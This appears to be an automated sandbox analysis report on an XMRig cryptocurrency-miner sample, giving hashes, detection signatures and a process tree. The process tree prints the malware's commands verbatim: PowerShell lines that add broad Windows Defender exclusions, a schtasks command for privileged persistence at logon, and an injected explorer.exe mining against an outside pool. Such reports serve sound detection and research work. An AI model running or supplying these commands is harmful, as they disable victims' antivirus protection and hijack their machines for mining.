Analysis
-
max time kernel
107s -
max time network
115s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 22:13
Static task
static1
Behavioral task
behavioral1
Sample
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe
Resource
win7-20240903-en
General
-
Target
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe
-
Size
2.1MB
-
MD5
9bc40b0890e81c429b325727e5ba5893
-
SHA1
a7561d62b00391fc996ee244bba8069ed3dd6bdb
-
SHA256
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344
-
SHA512
f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f
-
SSDEEP
49152:GvQUiuvKem70245BBqhM85yYESmScKCgwm8f63tk5LwjVg:GvQUhkz6HG5pESmSN9A4k9KVg
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 16 IoCs
Processes:
resource yara_rule behavioral1/memory/2496-58-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-71-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-68-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-66-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-64-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-62-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-81-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-72-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-80-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-60-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-56-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-54-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-52-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-83-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2496-82-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2748 powershell.exe 2660 powershell.exe 1564 powershell.exe 2016 powershell.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Executes dropped EXE 2 IoCs
Processes:
services64.exesihost64.exepid Process 1140 services64.exe 2020 sihost64.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.execonhost.exepid Process 1332 cmd.exe 1064 conhost.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid Process procid_target PID 1064 set thread context of 2496 1064 conhost.exe 48 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepid Process 2536 conhost.exe 2748 powershell.exe 2660 powershell.exe 1064 conhost.exe 1064 conhost.exe 1564 powershell.exe 2016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
conhost.exepowershell.exepowershell.execonhost.exepowershell.exeexplorer.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2536 conhost.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 1064 conhost.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeLockMemoryPrivilege 2496 explorer.exe Token: SeLockMemoryPrivilege 2496 explorer.exe Token: SeDebugPrivilege 2016 powershell.exe -
Suspicious use of WriteProcessMemory 61 IoCs
Processes:
ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.execonhost.execmd.execmd.execmd.exeservices64.execonhost.execmd.exesihost64.exedescription pid Process procid_target PID 1704 wrote to memory of 2536 1704 ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe 31 PID 1704 wrote to memory of 2536 1704 ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe 31 PID 1704 wrote to memory of 2536 1704 ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe 31 PID 1704 wrote to memory of 2536 1704 ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe 31 PID 2536 wrote to memory of 2808 2536 conhost.exe 32 PID 2536 wrote to memory of 2808 2536 conhost.exe 32 PID 2536 wrote to memory of 2808 2536 conhost.exe 32 PID 2808 wrote to memory of 2748 2808 cmd.exe 34 PID 2808 wrote to memory of 2748 2808 cmd.exe 34 PID 2808 wrote to memory of 2748 2808 cmd.exe 34 PID 2536 wrote to memory of 2828 2536 conhost.exe 36 PID 2536 wrote to memory of 2828 2536 conhost.exe 36 PID 2536 wrote to memory of 2828 2536 conhost.exe 36 PID 2828 wrote to memory of 2636 2828 cmd.exe 38 PID 2828 wrote to memory of 2636 2828 cmd.exe 38 PID 2828 wrote to memory of 2636 2828 cmd.exe 38 PID 2808 wrote to memory of 2660 2808 cmd.exe 39 PID 2808 wrote to memory of 2660 2808 cmd.exe 39 PID 2808 wrote to memory of 2660 2808 cmd.exe 39 PID 2536 wrote to memory of 1332 2536 conhost.exe 40 PID 2536 wrote to memory of 1332 2536 conhost.exe 40 PID 2536 wrote to memory of 1332 2536 conhost.exe 40 PID 1332 wrote to memory of 1140 1332 cmd.exe 42 PID 1332 wrote to memory of 1140 1332 cmd.exe 42 PID 1332 wrote to memory of 1140 1332 cmd.exe 42 PID 1140 wrote to memory of 1064 1140 services64.exe 43 PID 1140 wrote to memory of 1064 1140 services64.exe 43 PID 1140 wrote to memory of 1064 1140 services64.exe 43 PID 1140 wrote to memory of 1064 1140 services64.exe 43 PID 1064 wrote to memory of 1896 1064 conhost.exe 44 PID 1064 wrote to memory of 1896 1064 conhost.exe 44 PID 1064 wrote to memory of 1896 1064 conhost.exe 44 PID 1896 wrote to memory of 1564 1896 cmd.exe 46 PID 1896 wrote to memory of 1564 1896 cmd.exe 46 PID 1896 wrote to memory of 1564 1896 cmd.exe 46 PID 1064 wrote to memory of 2020 1064 conhost.exe 47 PID 1064 wrote to memory of 2020 1064 conhost.exe 47 PID 1064 wrote to memory of 2020 1064 conhost.exe 47 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1896 wrote to memory of 2016 1896 cmd.exe 49 PID 1896 wrote to memory of 2016 1896 cmd.exe 49 PID 1896 wrote to memory of 2016 1896 cmd.exe 49 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 1064 wrote to memory of 2496 1064 conhost.exe 48 PID 2020 wrote to memory of 2140 2020 sihost64.exe 50 PID 2020 wrote to memory of 2140 2020 sihost64.exe 50 PID 2020 wrote to memory of 2140 2020 sihost64.exe 50 PID 2020 wrote to memory of 2140 2020 sihost64.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\services64.exeC:\Users\Admin\AppData\Local\Temp\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:2140
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=806⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32KB
MD5703bba1d6c5595dcd7cbc5e34ed2ae33
SHA14c4e251addaf23f55350a8f1227d239d12aba92e
SHA25628f55ece940bf306a301835f5500498f5ef552d0f57ca988b01ee0b584128619
SHA5123c94a83a1f77b04eb91fbad142b965ca5c3bf6073e67314272aece6cd347b53f340f26aad34ba80ba65b26e186539e0327e6acd429ab6540d3eeada70199863a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5069b63f849e0092ab5d192a7d641ed78
SHA1ced2ee706334562c9c2de7bbfd523a246c5d1d25
SHA256b1b4d4cb569d21073ca89707a6de4a8deed13f7aa2ffab4fd5cd088af427b984
SHA512751b4e7448486335f20ed576a6891ffa80f7068c026411b1573c37eb5b9b7200093f7ff96c596ceb13231f86dedc0da52726aef8bbc3c0fdb3971da0c1b13e7f
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2.1MB
MD59bc40b0890e81c429b325727e5ba5893
SHA1a7561d62b00391fc996ee244bba8069ed3dd6bdb
SHA256ee0752e89d5da38dfbbde44e9b4b3dd90e8cf3e8b37c2a35cf43fe69f5258344
SHA512f08fc59295e0eb348c0eec1e2670b773001be7797832df829fa42c8cbeebfb5e0e4195b8bfb962c6143ceac29e7720f753993b0b3689678ef913a0de0aec5d7f